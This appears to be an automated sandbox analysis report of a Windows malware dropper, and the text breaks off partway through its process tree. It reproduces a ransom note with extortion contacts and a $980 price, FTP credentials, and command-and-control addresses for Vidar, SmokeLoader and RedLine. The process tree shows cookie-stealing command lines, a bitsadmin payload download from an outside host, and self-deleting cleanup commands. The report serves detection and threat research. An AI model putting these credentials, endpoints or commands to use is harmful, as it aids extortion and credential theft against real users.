Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1819s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-08-2021 23:43

General

  • Target

    8 (17).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CnI3tI6Ktv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0322gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-CnI3tI6Ktv

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    hhh6786
  • Password:
    Sutana666

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installs

C2

178.32.202.118:43127

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

806new

C2

erideeiles.xyz:80

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Detected phishing page
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 62 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 31 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 45 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 31 IoCs
  • Suspicious use of SetThreadContext 42 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2740
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2724
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2604
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2544
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2492
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1908
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1372
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                  • Modifies registry class
                  PID:1340
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1200
                  • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
                    "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3868
                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2344
                      • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\setup_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\setup_install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3740
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2668
                          • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_2.exe
                            sonia_2.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:3812
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3312
                          • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_3.exe
                            sonia_3.exe
                            5⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            PID:2272
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1444
                              6⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4700
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2208
                          • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_4.exe
                            sonia_4.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:608
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_6.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1116
                          • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_6.exe
                            sonia_6.exe
                            5⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:3728
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              6⤵
                              • Executes dropped EXE
                              PID:368
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              6⤵
                              • Executes dropped EXE
                              PID:4424
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              6⤵
                                PID:5588
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                6⤵
                                  PID:4404
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                              4⤵
                                PID:3924
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3856
                                • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_5.exe
                                  sonia_5.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:2308
                                  • C:\Users\Admin\Documents\1C8E32d1OziVl3qkVO_3wSoK.exe
                                    "C:\Users\Admin\Documents\1C8E32d1OziVl3qkVO_3wSoK.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • NTFS ADS
                                    PID:4772
                                  • C:\Users\Admin\Documents\RBosNNta6FcIldC5LlPeRVCt.exe
                                    "C:\Users\Admin\Documents\RBosNNta6FcIldC5LlPeRVCt.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4756
                                    • C:\Users\Admin\Documents\RBosNNta6FcIldC5LlPeRVCt.exe
                                      C:\Users\Admin\Documents\RBosNNta6FcIldC5LlPeRVCt.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4612
                                  • C:\Users\Admin\Documents\g9u7Kzg4dC9mawJdTnEGOaH9.exe
                                    "C:\Users\Admin\Documents\g9u7Kzg4dC9mawJdTnEGOaH9.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4744
                                    • C:\Users\Admin\Documents\g9u7Kzg4dC9mawJdTnEGOaH9.exe
                                      C:\Users\Admin\Documents\g9u7Kzg4dC9mawJdTnEGOaH9.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5016
                                  • C:\Users\Admin\Documents\ktB8SeMHf7jIFLzQS9nLWpUC.exe
                                    "C:\Users\Admin\Documents\ktB8SeMHf7jIFLzQS9nLWpUC.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4784
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:2360
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:5092
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3524
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5580
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 4784 -s 1540
                                        7⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:6048
                                    • C:\Users\Admin\Documents\YNgVIlPXGyzzqfsADf_ji8Lg.exe
                                      "C:\Users\Admin\Documents\YNgVIlPXGyzzqfsADf_ji8Lg.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4840
                                    • C:\Users\Admin\Documents\LyxlmKkgVCdjpC6fx0cjKhZy.exe
                                      "C:\Users\Admin\Documents\LyxlmKkgVCdjpC6fx0cjKhZy.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4824
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "LyxlmKkgVCdjpC6fx0cjKhZy.exe" /f & erase "C:\Users\Admin\Documents\LyxlmKkgVCdjpC6fx0cjKhZy.exe" & exit
                                        7⤵
                                          PID:4200
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "LyxlmKkgVCdjpC6fx0cjKhZy.exe" /f
                                            8⤵
                                            • Kills process with taskkill
                                            PID:1284
                                      • C:\Users\Admin\Documents\2EqpA1pBlNBhCP5fp8iz0JBE.exe
                                        "C:\Users\Admin\Documents\2EqpA1pBlNBhCP5fp8iz0JBE.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5020
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:5540
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:5228
                                        • C:\Users\Admin\Documents\scas6HxsF7IcpWx5VFL3TSld.exe
                                          "C:\Users\Admin\Documents\scas6HxsF7IcpWx5VFL3TSld.exe"
                                          6⤵
                                            PID:5092
                                          • C:\Users\Admin\Documents\xn3YR0YVT30_0F4dtWxZ2SPf.exe
                                            "C:\Users\Admin\Documents\xn3YR0YVT30_0F4dtWxZ2SPf.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5076
                                          • C:\Users\Admin\Documents\B1OR2bb8bVHF1Am4CpxcJ087.exe
                                            "C:\Users\Admin\Documents\B1OR2bb8bVHF1Am4CpxcJ087.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4400
                                            • C:\Users\Admin\AppData\Roaming\4613017.exe
                                              "C:\Users\Admin\AppData\Roaming\4613017.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5116
                                          • C:\Users\Admin\Documents\iqVRyyqZa4VLRVMXLF3wAmfL.exe
                                            "C:\Users\Admin\Documents\iqVRyyqZa4VLRVMXLF3wAmfL.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:4124
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2360
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                              7⤵
                                                PID:780
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5036
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5608
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5472
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5748
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                        7⤵
                                                        • Checks for any installed AV software in registry
                                                        PID:5760
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:5608
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                          PID:5680
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          7⤵
                                                            PID:4304
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5540
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5444
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4908
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3596
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:3844
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:1508
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      PID:2696
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5368
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:5356
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        8⤵
                                                                        • Checks BIOS information in registry
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:2720
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4556
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5332
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                              PID:5540
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj42F7.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:3920
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Loads dropped DLL
                                                                              PID:4920
                                                                          • C:\Users\Admin\Documents\jFioNS2O2dTbT3CQ9FPA8LBD.exe
                                                                            "C:\Users\Admin\Documents\jFioNS2O2dTbT3CQ9FPA8LBD.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4764
                                                                            • C:\Users\Admin\Documents\jFioNS2O2dTbT3CQ9FPA8LBD.exe
                                                                              "C:\Users\Admin\Documents\jFioNS2O2dTbT3CQ9FPA8LBD.exe" -q
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4176
                                                                          • C:\Users\Admin\Documents\Slq58Tr0CqL5VbPDj24xXDeX.exe
                                                                            "C:\Users\Admin\Documents\Slq58Tr0CqL5VbPDj24xXDeX.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:580
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Slq58Tr0CqL5VbPDj24xXDeX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Slq58Tr0CqL5VbPDj24xXDeX.exe" & del C:\ProgramData\*.dll & exit
                                                                              7⤵
                                                                                PID:5968
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im Slq58Tr0CqL5VbPDj24xXDeX.exe /f
                                                                                  8⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:5372
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /t 6
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:5008
                                                                            • C:\Users\Admin\Documents\AJAqrl9R893_3oTN_IOQdCBp.exe
                                                                              "C:\Users\Admin\Documents\AJAqrl9R893_3oTN_IOQdCBp.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:188
                                                                            • C:\Users\Admin\Documents\H2WWUf5SgGINCkqI2b3AmhPe.exe
                                                                              "C:\Users\Admin\Documents\H2WWUf5SgGINCkqI2b3AmhPe.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Program Files directory
                                                                              PID:5100
                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Drops startup file
                                                                                PID:2692
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5212
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5264
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5928
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
